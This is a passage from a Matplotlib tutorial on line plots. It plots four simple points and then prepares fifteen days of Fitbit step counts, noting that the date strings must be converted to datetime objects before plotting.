We'll first assign the variable dates_list to an empty list, to which we'll append our newly created datetime objects. We'll iterate over all elements in our original dates list of string values. For each item in our list, we'll call the strptime method of the datetime module and pass in two arguments. The first argument is our date - an item in our list. The second argument is the datetime format. Notice how the dates originally provided are in the format year-month-day with zero-padded month and day values. This means the 2nd of the month is 02 rather than just 2. Therefore, we must tell the strptime method this format with %Y for year, %m for month and %d for day.
dates_list = []
for date in dates:
    dates_list.append(datetime.strptime(date, '%Y-%m-%d'))
We can preview our first datetime object.
dates_list[0]
datetime.datetime(2018, 2, 1, 0, 0)
Our elements are of type datetime from the datetime module. Therefore, the type is datetime.datetime.
type(dates_list[0])
datetime.datetime
Plot Line Plot of New Data
plt.figure(figsize=(10, 8))
plt.plot(dates_list, steps);
In order to show more of the variation in steps per day, Matplotlib by default labels the smallest y-tick at 9500 instead of simply 0. I also called the figure method and passed in a larger than normal figure size so we could easily see the y-tick values.
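A natural next step, not covered in the original post, is to format the date labels on the x-axis. The sketch below assumes the dates_list and steps variables defined above and uses Matplotlib's dates module; the tick interval and date format are arbitrary choices.

import matplotlib.dates as mdates

fig, ax = plt.subplots(figsize=(10, 8))
ax.plot(dates_list, steps)
ax.set_xlabel('date')
ax.set_ylabel('steps')
# Place a tick every other day and render it as an abbreviated month name plus day.
ax.xaxis.set_major_locator(mdates.DayLocator(interval=2))
ax.xaxis.set_major_formatter(mdates.DateFormatter('%b %d'))
fig.autofmt_xdate()  # rotate the date labels so they do not overlap
plt.show()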
https://dfrieds.com/data-visualizations/line-plots-python-matplotlib
CC-MAIN-2019-26
en
refinedweb
From: Toon Knapen (toon.knapen_at_[hidden]) Date: 2004-08-16 04:17:57
I added an extension module 'f.jam' to be able to compile fortran sources with bjam version 2. Now I also tried to add requirements for include files but I did not find a way to make it work. What I did in my f.jam is:
import toolset : flags ;
flags f.compile INCLUDES <include> ;
and then use the $(INCLUDES) variable on the command-line where the fortran compiler is invoked. But the INCLUDES variable remains empty. Any ideas how I can solve this? (my project is in attachment)
https://lists.boost.org/boost-build/2004/08/6987.php
CC-MAIN-2019-26
en
refinedweb
Submitted By:
Name - Ved Prakash Singh
Roll No. - 08100EN034
Class - B.Tech., Part-3, CSE, IT_BHU, Varanasi.
OpenGL is widely used in CAD, virtual reality, scientific visualization, information visualization, and flight simulation. It is also used in video games, where it competes with Direct3D on Microsoft Windows platforms (see OpenGL vs. Direct3D). OpenGL is managed by a non-profit technology consortium, the Khronos Group.
OpenGL 4.1 at a glance: OpenGL 4.1 improves OpenCL interoperability for accelerating computationally intensive visual applications and continues support for both the Core and Compatibility profiles first introduced with OpenGL 3.2, enabling developers to use a streamlined API or retain backwards compatibility for existing OpenGL code, depending on their market needs. Full compatibility with OpenGL ES 2.0 APIs for easier porting between mobile and desktop platforms.
OpenGL 4.1 Core Profile Specification
OpenGL 4.1 Compatibility Profile Specification
OpenGL Shading Language 4.10.6 Specification
OpenGL Registry
If we want to add an extension specification to the Registry, correct an existing specification, request allocation of enumerants and other controlled resources in the OpenGL / GLX / WGL namespaces, or otherwise change the Registry, please create a Bugzilla account on the public Khronos.org Bugzilla, and submit your request there against Product "OpenGL", Component "Registry". You can use this Bugzilla link, which fills in many fields for us. The Registry includes databases defining the APIs and reserved enumerant ranges for OpenGL, GLX, and WGL. There are several of these ".spec" files for each API, described below:
OpenGL .spec files
- enum.spec - canonical description of the reserved OpenGL enumerants and the ranges allocated for different purposes. New allocations are made here and when extensions using values in allocated ranges are registered, the enumerants in those extensions are added as well.
- enumext.spec - derived variant of enum.spec containing the enumerant values grouped by the extension or API core revision they correspond to.
- gl.spec - canonical description of the functions defined by core OpenGL and extensions. When extensions are registered, the functions they define are added here.
- gl.tm - typemap used to convert the abstract typenames in gl.spec into underlying GL types.
- enumext.spec, gl.spec, and gl.tm are used to generate glext.h.
GLX .spec files
- glxenum.spec - canonical description of the reserved GLX enumerants, like enum.spec.
- glxenumext.spec - derived variant of glxenum.spec containing the enumerant values grouped by the GLX extension or API core revision they correspond to. This only includes GLX core versions 1.3 and later.
- glx.spec - canonical description of the functions defined by core GLX up to version 1.3.
- glxext.spec - canonical description of the functions defined by GLX extensions and core versions 1.3 and later.
- glx.tm - typemap used to convert the abstract typenames in glx*.spec into underlying GLX types.
- glxenumext.spec, glxext.spec, and glx.tm are used to generate glxext.h.
WGL .spec files
- wglenum.spec - canonical description of the reserved WGL enumerants, like enum.spec.
- wglenumext.spec - derived variant of wglenum.spec containing the enumerant values grouped by the WGL extension they correspond to. This only includes WGL core versions 1.3 and later (Microsoft has never revised the WGL core API).
- wgl.spec - canonical description of the functions defined by WGL.
- wglext.spec - canonical description of the functions defined by WGL extensions.
- wgl.tm - typemap used to convert the abstract typenames in wgl*.spec into underlying WGL and Win32 types.
- wglenumext.spec, wglext.spec, and wgl.tm are used to generate wglext.h.
Example: This example will draw a green square on the screen. OpenGL has several ways to accomplish this task, but this is the easiest to understand. However, the reader should be aware that most of the APIs used in the code below have been deprecated in and after the OpenGL 3.0 specification.
(The code listing for this example did not survive the conversion of this document; only fragments of its comments remain. Those fragments describe the modelview matrix as defining a transform from model-relative coordinates to camera-relative space, and note that the combination of the modelview matrix and the projection matrix transforms objects from model-relative space to projection/screen space.)
Window-system binding APIs:
GLX - X11 (including network transparency)
WGL - Microsoft Windows
CGL - Mac OS X
Better integration with Mac OS X's application frameworks is provided by APIs layered on top of CGL: AGL for Carbon and NSOpenGL for Cocoa. Additionally, GLUT, SDL and the GLFW libraries provide functionality for basic windowing using OpenGL, in a portable manner. Some open source cross-platform toolkits, such as GTK+, Qt and WxWidgets, include widgets to embed OpenGL contents.
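Since the original listing is missing, the following is a rough stand-in written with PyOpenGL rather than the document's own code: a minimal GLUT program that draws a green square using the same deprecated fixed-function calls the text refers to. It assumes the PyOpenGL package and a GLUT implementation are installed; the window size and coordinates are arbitrary choices.

# Rough PyOpenGL/GLUT sketch of a green square (not the document's original listing).
from OpenGL.GL import (GL_COLOR_BUFFER_BIT, GL_MODELVIEW, GL_PROJECTION, GL_QUADS,
                       glBegin, glClear, glColor3f, glEnd, glFlush, glLoadIdentity,
                       glMatrixMode, glOrtho, glVertex2f)
from OpenGL.GLUT import (GLUT_RGB, GLUT_SINGLE, glutCreateWindow, glutDisplayFunc,
                         glutInit, glutInitDisplayMode, glutInitWindowSize, glutMainLoop)

def display():
    glClear(GL_COLOR_BUFFER_BIT)
    # Projection matrix: a simple orthographic view volume.
    glMatrixMode(GL_PROJECTION)
    glLoadIdentity()
    glOrtho(-1.0, 1.0, -1.0, 1.0, -1.0, 1.0)
    # Modelview matrix: identity, so model coordinates map directly to camera space.
    glMatrixMode(GL_MODELVIEW)
    glLoadIdentity()
    glColor3f(0.0, 1.0, 0.0)   # green
    glBegin(GL_QUADS)          # one square from four vertices
    glVertex2f(-0.5, -0.5)
    glVertex2f(0.5, -0.5)
    glVertex2f(0.5, 0.5)
    glVertex2f(-0.5, 0.5)
    glEnd()
    glFlush()

glutInit()
glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)
glutInitWindowSize(400, 400)
glutCreateWindow(b"Green square")
glutDisplayFunc(display)
glutMainLoop()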
https://de.scribd.com/document/94008221/An-Introduction-to-OpenGL
CC-MAIN-2019-26
en
refinedweb
main()FunctionAttributes: FunctionAttribute FunctionAttribute FunctionAttributes FunctionAttribute: nothrow pure Property MemberFunctionAttributes: MemberFunctionAttribute MemberFunctionAttribute MemberFunctionAttributes MemberFunctionAttribute: const immutable inout return shared FunctionAttribute The in and out blocks or expressions of a function declaration specify the pre- and post-conditions of the function. They are used in Contract Programming. The code inside these blocks should not have any side-effects, including modifying function parameters and/or return values. Function return values are considered to be rvalues. This means they cannot be passed by reference to other functions. control mutations, D has the immutable type qualifier. If all of a pure function's parameters are immutable or copied values without any indirections, it can guarantee that the pure function has no side effects. can only throw exceptions derived from class Error. Nothrow functions are covariant with throwing ones. Ref functions allow functions to return by reference. This is analogous to ref function parameters. ref int foo() { auto p = new int; return *p; } ... foo() = 3; // reference returns can be lvalues); } WARNING: The definition and usefulness of property functions is being reviewed, and the implementation is currently incomplete. Using property functions is not recommended until the definition is more certain and implementation more mature. Properties are functions that can be syntactically treated as if they were fields or variables. Properties can be read from or written to. A property is read by calling a method or function with no arguments; a property is written by calling a method or function with its argument being the value it is set to. Simple getter and setter properties can be written using UFCS. These can be enhanced with the additon of the @property attribute to the function, which adds the following behaviors: @propertyfunctions cannot be overloaded with non- @propertyfunctions with the same name. @propertyfunctions can only have zero, one or two parameters. @propertyfunctions cannot have variadic parameters. typeof(exp)where expis an @propertyfunction, the type is the return type of the function, rather than the type of the function. __traits(compiles, exp)where expis an @propertyfunction, a further check is made to see if the function can be called. @propertyare mangled differently, meaning that @propertymust be consistently used across different compilation units. @propertysetter functions as special and modifies them accordingly. A simple property would be: struct Foo { @property int data() { return m_data; } // read property , have their address taken, etc.. This results in fewer bugs caused by not declaring a function virtual and then overriding it anyway. Member functions which are private or package are never virtual, and hence cannot be { override int def() { ... } // ok, overrides A.def override { // overrides and is covariant with Foo.test() override B test() { return null; } } Virtual functions all have a hidden parameter called the this reference, which refers to the class object for which the function is called.(); } A function foo = A. } The compiler makes the decision whether to inline a function or not. This decision may be controlled by pragma(inline), assuming that the compiler implements it, which is not mandatory. Note that any FunctionLiteral should be inlined when used in its declaration scope. 
Functions are overloaded based on how well the arguments to a function can match up with the parameters. The function with the best match is selected. The levels of matching are:. This is because the name mangling might not take the parameter types into account.: import A; import B; void bar(C c) { foo(); // calls A.foo() foo(1L); // calls A.foo(long) foo(c); // calls B.foo(C) foo(1,2); // error, does not match any foo foo(1); // error, matches A.foo(long) and B.foo(int) A.foo(1); // calls A.foo(long) } Even though B.foo(int) is a better match than A.foo(long) for foo(1), it is an error because the two matches are in different overload sets. Overload sets can be merged with an alias declaration: import A; import B; alias) } Parameter storage classes are in, out, ref, lazy, const, immutable, shared, inout or scope. For example: int foo(in int x, out int y, ref int z, int q); x is in, y is out, z is ref, and q is none. void foo(out int x) { // x is set to int.init, // which. An argument to a lazy parameter is not evaluated before the function is called. The argument is only evaluated if/when the parameter is evaluated within the function. Hence, a lazy argument can be executed 0 or more times. void dotimes(int n, lazy void exp) { while (n--) exp(); } void test() { int x; dotimes(3, writeln(x++)); } prints to the console: 0 1 2 A lazy parameter cannot be an lvalue. A lazy parameter of type void can accept an argument of any type. See Also: Lazy Variadic Functions Function parameter declarations can have default values: void foo(int x, int y = 3) { ... } ... foo(4); // same as foo(4, 3); Default parameters are evaluated in the context of the function declaration. If the default value for a parameter is given, all following parameters must also have default values. } Ref methods marked with the return attribute ensure the returned reference will not outlive the respective aggregate instance. struct S { private int x; ref int get() return { return x; } } ref int escape() { S s; return s.get(); // Error: escaping reference to local variable s } Template functions and lambdas can deduce the return attribute. inout ref parameters imply the return attribute. Functions taking a variable number of arguments are called variadic functions. A variadic function can take one of three forms:); }which prints: 0x00870FE0 5 arguments int 2 long 3 double 4.5 Foo 0x00870FE0 Bar 0x00870FD0 D-style variadic functions cannot be marked as @safe. Typesafe variadic functions are used when the variable argument portion of the arguments are used to construct an array or class object. For arrays: int hides another local variable in the same function: void func(int x) { int x; // error, hides previous definition of x double y; ... { char y; // error, hides previous definition of y int z; } { wchar z; // legal, previous z is out of scope } } While this might look unreasonable, in practice whenever this is done it either is a bug or at least looks like a bug. It is an error to return the address of or a reference to a local variable. It is an error to have a local variable and a label with the same name.); } Future directions: Function pointers and delegates may merge into a common syntax and be interchangeable with each other. See FunctionLiter(string[] args) { ... } int main() { ... } int main(string[] args) { ... }. Functions which are both portable and free of global side-effects can be executed at compile time. In certain contexts, such compile time execution is guaranteed. 
It is called Compile Time Function Execution (CTFE) then. The contexts that trigger CTFE are: static if static foreach static assert mixinstatement pragmaargument enum eval(Args...) = Args[0]; int square(int i) { return i * i; } void foo() { static j = square(3); // CTFE writeln(j); assert(square(4)); // run time writeln(eval!(square(5))); // CTFE } CTFE is subject to the following restrictions: int[]to float[]), including casts which depend on endianness, are not permitted. Casts between signed and unsigned types are permitted Pointers are permitted in CTFE, provided they are used safely: <, < =, >, >=) between two pointers is permitted when both pointers point to the same array, or when at least one pointer is null. & can give different results from run time in the following scenarios: These are the same kinds of scenarios where different optimization settings affect the results. Any functions that execute in CTFE foocannot be generated. A function template would be the appropriate method to implement this sort of thing. No-GC functions are functions marked with the @nogc attribute. Those functions do not allocate memory on the GC heap, through the following language features: .lengthproperty RangeErrorif the specified key is not present) . } To ease debugging, in a ConditionalStatement controlled by a DebugCondition @nogc functions can call functions that are not @nogc. Safe functions are functions that are statically checked to exhibit no possibility of undefined behavior. Undefined behavior is often used as a vector for malicious attacks. Safe functions are marked with the @safe attribute. The following operations are not allowed in safe functions: void*. class Exception. __gsharedvariables. are marked with the @trusted attribute. Trusted functions are guaranteed by the programmer to not exhibit any undefined behavior if called by a safe function. Generally, trusted functions should be kept small so that they are easier to manually verify. Trusted functions may call safe, trusted, or system functions. Trusted functions are covariant with safe or[]) } } © 1999–2018 The D Language Foundation Licensed under the Boost License 1.0.
https://docs.w3cub.com/d/function/
CC-MAIN-2019-26
en
refinedweb
Search an element in an unsorted array using minimum number of comparisons
Given an array of n distinct integers and an element x, search for x in the array using the minimum number of comparisons. Any comparison contributes 1 to the count of comparisons. For example, the condition used to terminate a loop also contributes 1 to the count each time it is executed. Expressions like while (n) {n--;} also contribute to the count of comparisons, because the value of n is compared internally to decide whether or not to terminate the loop.
Examples:
Input : arr[] = {4, 6, 1, 5, 8}, x = 1
Output : Found
Input : arr[] = {10, 3, 12, 7, 2, 11, 9}, x = 15
Output : Not Found
Asked in Adobe Interview
The simple method below requires 2n + 1 comparisons in the worst case.
for (i = 0; i < n; i++)   // Worst case n+1
    if (arr[i] == x)      // Worst case n
        return i;
How to reduce the number of comparisons? The idea is to copy x (the element to be searched) to the last location, so that one last comparison when x is not present in arr[] is saved.
Algorithm:
search(arr, n, x)
    if arr[n-1] == x          // 1 comparison
        return "true"
    backup = arr[n-1]
    arr[n-1] = x
    for i=0, i++              // no termination condition
        if arr[i] == x        // executes at most n times,
                              // that is, at most n comparisons
            arr[n-1] = backup
            return (i < n-1)  // 1 comparison
(Implementations in C/C++, Java, Python3, C#, and PHP appeared here in the original article.)
Output: Found
Time Complexity: O(n)
Number of Comparisons: At most (n+2) comparisons
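Since the language-specific implementations were not preserved in this copy, here is a sketch in Python that follows the pseudocode above; the function name and the choice to return a boolean are mine, not the article's.

def search(arr, x):
    # Returns True if x is present in arr, using at most n + 2 comparisons.
    n = len(arr)
    if arr[n - 1] == x:            # 1 comparison
        return True
    backup = arr[n - 1]
    arr[n - 1] = x                 # sentinel: the loop below is guaranteed to stop
    i = 0
    while True:                    # no comparison in the loop header itself
        if arr[i] == x:            # at most n comparisons over all iterations
            arr[n - 1] = backup    # restore the original last element
            return i < n - 1       # 1 comparison: was x found before the sentinel?
        i += 1

print("Found" if search([4, 6, 1, 5, 8], 1) else "Not Found")            # Found
print("Found" if search([10, 3, 12, 7, 2, 11, 9], 15) else "Not Found")  # Not Found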
https://www.geeksforgeeks.org/search-element-unsorted-array-using-minimum-number-comparisons/
CC-MAIN-2019-26
en
refinedweb
Traditionally, we need to do the following to include any of the Syncfusion Angular components in the Angular CLI environment:

- Create a new Angular CLI application.
- Install the Syncfusion Angular package.
- Register the module in app.module.ts.
- Add the required theme references.
- Add the Syncfusion Angular component.
- Compile and run the application using the ng serve -o command.

In the manual configuration process, we may encounter many issues while working with multiple packages. Because of this, we recommend Angular Schematics for configuring any Syncfusion Angular component with simple commands. Schematics is a modern web scaffolding tool that can apply transforms to your project, such as creating new components, and installing and configuring existing Angular libraries.

I am very excited to announce that our Angular UI component suite supports Schematics out of the box! This provides the following:

- Add, install, and configure any Syncfusion Angular package.
- Include our readily available themes in your application.
- Include the most frequently used code snippets of our components.

In this blog, we are going to learn how to use our Angular Schematics features in an Angular CLI application. Let's start with the integration and configuration.

Create Angular CLI application

Before we get started with configuration, ensure the latest Angular CLI is installed in your system environment. If it is not installed, we recommend you use the following command to install it:

npm install -g @angular/cli

Run the following command to create a new Angular CLI application:

ng new syncfusion-schematics

This command asks for routing and style sheet format inputs to create the application; those choices are up to you. In the following figure, we are enabling routing and using CSS for the style sheet format.

Creating an Angular CLI application

Configure Syncfusion Angular packages

The Angular CLI application is now ready. Navigate to the created CLI application using the following command:

cd syncfusion-schematics

Now you can install and configure any Syncfusion Angular package using the ng add command. Here, we are going to configure our ListView component using the following command:

ng add @syncfusion/ej2-angular-lists

This command will configure the ListView component with the default Material theme in the Angular CLI application. If you wish to change the built-in theme, include the theme attribute with the ng add command, as shown in the following code:

ng add @syncfusion/ej2-angular-lists --theme="fabric"

You can see the code changes required for changing the theme in the following screenshots from the Visual Studio Code editor.

Note: You may use our Angular packages with multiple modules. For example, our @syncfusion/ej2-angular-popups package has multiple modules such as Dialog and Tooltip. We can include a specific module using the --modules attribute, as in the following command:

ng add @syncfusion/ej2-angular-popups --modules="tooltip"

Include code examples

The Syncfusion ListView component is now configured in the Angular CLI application. Next, we are going to include the default ListView code example in this application using the ng generate command.

ng g @syncfusion/ej2-angular-lists:listview-default --name=syncfusion-lists

This command will include the code examples in the syncfusion-lists Angular component file. You can reference the syncfusion-lists folder for the created component file changes. The command execution should look like the following figure.
Adding ListView to the application

Routing for Syncfusion ListView

Finally, we must include the routing for the created ListView Angular component in the app.routing.ts file.

[app.routing.ts]

import { NgModule } from '@angular/core';
import { Routes, RouterModule } from '@angular/router';

// Syncfusion ListView component routing.
import { SyncfusionListsComponent } from './syncfusion-lists/syncfusion-lists.component';

const routes: Routes = [
  { path: 'lists', component: SyncfusionListsComponent },
  { path: '', pathMatch: 'full', redirectTo: 'lists' }
];

@NgModule({
  imports: [RouterModule.forRoot(routes)],
  exports: [RouterModule]
})
export class AppRoutingModule { }

Serve the application

Go to the application directory and launch the server using the following command:

ng serve --open

Once all the files are compiled successfully, the site will be served locally and opened in your browser. The ListView default sample should look something like the following figure.

ListView Sample Served

If you wish, navigate to the following location to explore the code examples for the Syncfusion ListView component:

node_modules/@syncfusion/ej2-angular-lists/schematics/generators

Location of ListView Examples

You can replace the listview-default name with the proper folder name to include a specific code example of our ListView component, using the ng g command from the "Include code examples" section above. For example, the remote-list code example will be included when you use the following command:

ng g @syncfusion/ej2-angular-lists:listview-remotelist --name=syncfusion-lists

Summary

In this blog, we learned how to use Syncfusion Angular Schematics to configure and generate samples for our Angular components in an Angular CLI application using simple commands. Feel free to check out the Syncfusion Angular components on GitHub, our sample browser, and our documentation to explore live demos of the components and their various customization features.
https://www.syncfusion.com/blogs/post/schematics-for-syncfusion-angular-ui-components.aspx
CC-MAIN-2019-26
en
refinedweb
Create Your First Application (Compact 2013)

9/29/2014

You can create applications for Windows Embedded Compact 2013 in two ways: you can add them as subprojects of the OS in Platform Builder, or you can use an SDK to create them in Visual Studio outside of Platform Builder. In this exercise, you will create your application as a subproject of Platform Builder.

You can write Windows Embedded Compact 2013 applications in either native (C++) code or managed code. In this example, you use native code.

Add a subproject to your OS design

- In Platform Builder, open your OS design project.
- Go to Project > Add New Subproject to start the Subproject Wizard.
- On the Select name, location and templates page, under Available templates, select WCE Application.
- Enter a Subproject name, and then select a Location for the project files.
- On the Auto-generated subproject files page, select A simple application, and then click Finish.

In Solution Explorer, your new subproject appears under the Subprojects node of your OS design.

Modify the code

In this exercise, you will add code to your subproject so that your device displays a Getting Started window with the text Hello, World!

In the Solution Explorer pane, go to Subprojects > {your application name} > Source files, and then open the C++ file for your application ({your application name}.cpp).

Add your code to the C++ file to display a window with the text Hello, World!. Or, if you want, you can copy the sample code below, and then paste it into the source file.

    #include "stdafx.h"

    TCHAR szTitle[] = TEXT("Getting Started");
    TCHAR szWindowClass[] = TEXT("Getting Started");

    ATOM MyRegisterClass(HINSTANCE hInstance);
    BOOL InitInstance(HINSTANCE, int);
    LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);

    int WINAPI WinMain(
        HINSTANCE hInstance,
        HINSTANCE hPrevInstance,
        LPTSTR lpCmdLine,
        int nCmdShow
        )
    {
        MyRegisterClass(hInstance);

        if (!InitInstance (hInstance, nCmdShow))
        {
            return FALSE;
        }

        MSG msg;
        while (GetMessage(&msg, NULL, 0, 0))
        {
            TranslateMessage(&msg);
            DispatchMessage(&msg);
        }

        return msg.wParam;
    }

    ATOM MyRegisterClass(
        HINSTANCE hInstance
        )
    {
        WNDCLASS wc;

        wc.style = CS_HREDRAW | CS_VREDRAW;
        wc.lpfnWndProc = (WNDPROC) WndProc;
        wc.cbClsExtra = 0;
        wc.cbWndExtra = 0;
        wc.hInstance = hInstance;
        wc.hIcon = 0;
        wc.hCursor = 0;
        wc.hbrBackground = (HBRUSH) GetStockObject(WHITE_BRUSH);
        wc.lpszMenuName = 0;
        wc.lpszClassName = szWindowClass;

        return RegisterClass(&wc);
    }

    BOOL InitInstance(HINSTANCE hInstance, int nCmdShow)
    {
        HWND hWnd = CreateWindow (
            szWindowClass,
            szTitle,
            WS_VISIBLE | WS_SYSMENU | WS_CAPTION,
            250, 190, 150, 75,
            NULL, NULL, hInstance, NULL
            );

        if (!hWnd)
        {
            return FALSE;
        }

        ShowWindow(hWnd, nCmdShow);
        UpdateWindow(hWnd);

        return TRUE;
    }

    LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
    {
        PAINTSTRUCT ps;
        HDC hdc;

        switch (message)
        {
            case WM_PAINT:
                hdc = BeginPaint(hWnd, &ps);
                RECT rt;
                GetClientRect(hWnd, &rt);
                DrawText(hdc, TEXT("\nHello, World!"), -1, &rt, DT_CENTER);
                EndPaint(hWnd, &ps);
                break;
            case WM_DESTROY:
                PostQuitMessage(0);
                break;
            default:
                return DefWindowProc(hWnd, message, wParam, lParam);
        }

        return 0;
    }

Build your subproject

Now build your subproject and include the application's executable file with your OS run-time image. (You can build the entire OS again, but if you build just the subproject, the build process is much, much faster, and you don't have to detach your test device.)

Note: Before you build your application subproject, you must have an existing build for this OS design.
To build the subproject:

- In Solution Explorer, expand the Subprojects node, and then select your application subproject.
- Go to Build > Build All Subprojects.

Download and run the application

Use the same steps from Connect to your virtual device and download the OS run-time image to update the run-time image on your test device. When your test device boots with the new OS run-time image, use the following procedure to run the application on your device.

To run the application:

- In Platform Builder, go to Target > Run Programs.
- Select the executable file for your application ({your application name}.exe), and then click Run.

Your test device should now display a window with the text "Hello, World!"

Learn more about

- Subprojects in your OS design: A subproject is a collection of files that calls the APIs of the features that are included in your OS design. A subproject can be an application, a dynamic-link library (DLL), or a static library. For more information, see Create Your Application as a Platform Builder Subproject.
- Control your target device: The Target Control lets you transfer files to a target device, load and manage debugger DLLs, and test applications. For more information about the Target Control commands, see Target Control Debugging.
- Use an SDK to develop applications: For more information about how you can develop and test applications without using Platform Builder, see Create Your Application Using an SDK for an OS Image.
- Develop applications with XAML for Windows Embedded: For detailed information, see Getting Started with XAML for Windows Embedded.
https://docs.microsoft.com/en-us/previous-versions/windows/embedded/jj200344%28v%3Dwinembedded.80%29
CC-MAIN-2019-35
en
refinedweb
Hi there,

I have a cross platform iOS/Android Forms project that crashes on Android any time a Button is removed from a StackLayout, or a StackLayout with a Button in it is removed from the page's Content. The most simple version of the code in Forms that causes the crash looks like this:

public class LoginPageTest : ContentPage
{
    StackLayout Layout1;
    StackLayout Layout2;
    Button OnBoardLoginButton;
    Label Label1;

    public LoginPageTest()
    {
        Layout1 = new StackLayout
        {
            HorizontalOptions = LayoutOptions.FillAndExpand,
            VerticalOptions = LayoutOptions.FillAndExpand
        };

        OnBoardLoginButton = new Button { Text = "PRESS ME" };
        OnBoardLoginButton.Pressed += OnLoginButtonPressed;

        Layout1.Children.Add(OnBoardLoginButton);
        Content = Layout1;
    }

    private void OnLoginButtonPressed(object sender, EventArgs e)
    {
        Layout1.Children.Remove(OnBoardLoginButton);
    }
}

The error reported is: Unable to activate instance of type Xamarin.Forms.Platform.Android.AppCompat.ButtonRenderer from native handle 0xbe8b2e6c (key_handle 0x3004107).

The same error happens on Android (but not iOS) if the Content property of the page is changed from one StackLayout with a Button in it to another StackLayout. This error doesn't happen on iOS. It only happens on Android and happens on devices and the simulator.

Is this normal behaviour? I have some ideas on how to work around it, but I'd like to avoid implementing them and keep the same code if I can, since it already works fine in iOS. Thanks for your time.

Honestly it doesn't surprise me. When you go against good practices all sorts of unexpected bad things happen. Something is probably about half rendered when you remove it and suddenly there is no reference etc. Try following accepted practices by building your UI in XAML... and don't add/remove controls from code behind like that. This is not Windows Forms circa 1997.

Thanks Alessandro. This was my planned workaround.

Ok. Thanks for the solution.
https://forums.xamarin.com/discussion/comment/342623/
CC-MAIN-2019-35
en
refinedweb
Keras Callbacks Explained In Three Minutes

A gentle introduction to callbacks in Keras. Learn about EarlyStopping, ModelCheckpoint, and other callback functions with code examples.

Building Deep Learning models without callbacks is like driving a car with no functioning brakes: you have little to no control over the whole process, and that is very likely to result in a disaster. In this article, you will learn how to monitor and improve your Deep Learning models using Keras callbacks like ModelCheckpoint and EarlyStopping.

What are callbacks?

From the Keras documentation: A callback is a set of functions to be applied at given stages of the training procedure. You can use callbacks to get a view on internal states and statistics of the model during training.

You define and use a callback when you want to automate some tasks after every training step or epoch, which gives you control over the training process. This includes stopping training when you reach a certain accuracy/loss score, saving your model as a checkpoint after each successful epoch, adjusting the learning rates over time, and more. Let's dive deep into some callback functions!

EarlyStopping

Overfitting is a nightmare for Machine Learning practitioners. One way to avoid overfitting is to terminate the training process early. The EarlyStopping function has various arguments that you can modify to set up when the training process should stop. Here are some relevant ones:

- monitor: the value being monitored, e.g. val_loss
- min_delta: the minimum change in the monitored value that counts as an improvement. For example, min_delta=1 means that an absolute change smaller than 1 is treated as no improvement.
- patience: number of epochs with no improvement after which training will be stopped
- restore_best_weights: set this to True if you want to keep the best weights once training stops

The code example below defines an EarlyStopping callback that tracks the val_loss value, stops the training if val_loss does not improve for 3 epochs, and keeps the best weights once the training stops:

from keras.callbacks import EarlyStopping

earlystop = EarlyStopping(monitor='val_loss',
                          min_delta=0,
                          patience=3,
                          verbose=1,
                          restore_best_weights=True)

ModelCheckpoint

This callback saves the model after every epoch. Here are some relevant arguments:

- filepath: the file path you want to save your model in
- monitor: the value being monitored
- save_best_only: set this to True if you do not want to overwrite the latest best model
- mode: auto, min, or max. For example, set mode='min' if the monitored value is val_loss and you want to minimize it.

Example:

from keras.callbacks import ModelCheckpoint

checkpoint = ModelCheckpoint(filepath,
                             monitor='val_loss',
                             mode='min',
                             save_best_only=True,
                             verbose=1)

LearningRateScheduler

from keras.callbacks import LearningRateScheduler

scheduler = LearningRateScheduler(schedule, verbose=0)  # schedule is a function

This one is pretty straightforward: it adjusts the learning rate over time using a schedule that you write beforehand. The schedule function returns the desired learning rate (output) based on the current epoch (epoch index as input); a minimal example of such a schedule function is sketched below.
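For illustration, here is one possible schedule function to pass to LearningRateScheduler. The starting rate and the decay policy are placeholder choices, not values from the article.

from keras.callbacks import LearningRateScheduler

initial_lr = 0.001  # assumed starting learning rate (placeholder)

def schedule(epoch):
    # Halve the learning rate every 10 epochs (arbitrary example policy).
    return initial_lr * (0.5 ** (epoch // 10))

scheduler = LearningRateScheduler(schedule, verbose=1)
# model.fit(x_train, y_train, epochs=50, callbacks=[scheduler])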
Other Callback functions

Along with the above functions, there are other callbacks that you might encounter or want to use in your Deep Learning project:

- History and BaseLogger: callbacks that are applied automatically to your model by default
- TensorBoard: This is hands down my favorite Keras callback. It writes a log for TensorBoard, which is TensorFlow's excellent visualization tool. If you have installed TensorFlow with pip, you should be able to launch TensorBoard from the command line: tensorboard --logdir=/full_path_to_your_logs
- CSVLogger: This callback streams epoch results to a CSV file
- LambdaCallback: This callback allows you to build custom callbacks (a small sketch follows the conclusion below)

Conclusion

In this article, you have learned the main concept of callbacks in Keras and the most common callback functions. The Keras documentation has a very comprehensive page on callbacks that you should definitely check out.
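As a closing illustration of the LambdaCallback mentioned above, here is a minimal sketch; the callback name and the printed message are illustrative, not from the article.

from keras.callbacks import LambdaCallback

# Print the loss at the end of every epoch (illustrative only).
print_loss = LambdaCallback(
    on_epoch_end=lambda epoch, logs: print(
        "Epoch {} finished with loss {:.4f}".format(epoch + 1, logs["loss"])
    )
)

# model.fit(x_train, y_train, epochs=10, callbacks=[print_loss])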
https://medium.com/towards-artificial-intelligence/keras-callbacks-explained-in-three-minutes-846a43b44a16?source=collection_home---4------0-----------------------
CC-MAIN-2019-35
en
refinedweb
Code Inspections in XML

- XML tag empty body: Reports an empty tag body. The validation works in XML / JSP / JSPX / HTML / XHTML file types. Default severity: Warning
- Unresolved DTD reference: Checks the consistency of DTD-specific references, e.g. references to an XML entity or to a DTD element declaration. The validation works in DTD or XML file types. Default severity: Error
- File does not pass external validation: Thoroughly checks XML files for DTD/schema compliance using the Xerces validator. The validation works in XML or XHTML file types. Default severity: Error
- Duplicate ID: This inspection checks for duplicate "id" attributes in XML. Default severity: Error
- Unresolved ID: This inspection checks for unresolved "id" attributes in XML. Default severity: Error
- Wrong root element: This inspection checks if the root tag name is the same as in <doctype>. Default severity: Error
- Unbound XML namespace prefix: This inspection checks for unbound namespace prefixes in XML. Default severity: Warning
- Unused XML schema declaration: Checks for unused namespace declarations and location hints in XML. Default severity: Warning
- File path resolving in XML: Highlights unresolved file references in XML. Default severity: Error
- Redundant default attribute value assignment: This inspection checks for redundant default XML attribute value assignments. Default severity: Warning
- Deprecated elements: This inspection checks for deprecated XML elements. The elements can be marked by an XML comment or documentation tag with the text "deprecated". Default severity: Warning
- XML highlighting: Highlights XML validation problems in the results of batch code inspection. Default severity: Error

Last modified: 16 August 2019
https://www.jetbrains.com/help/rider/Code_Inspections_in_XML.html
CC-MAIN-2019-35
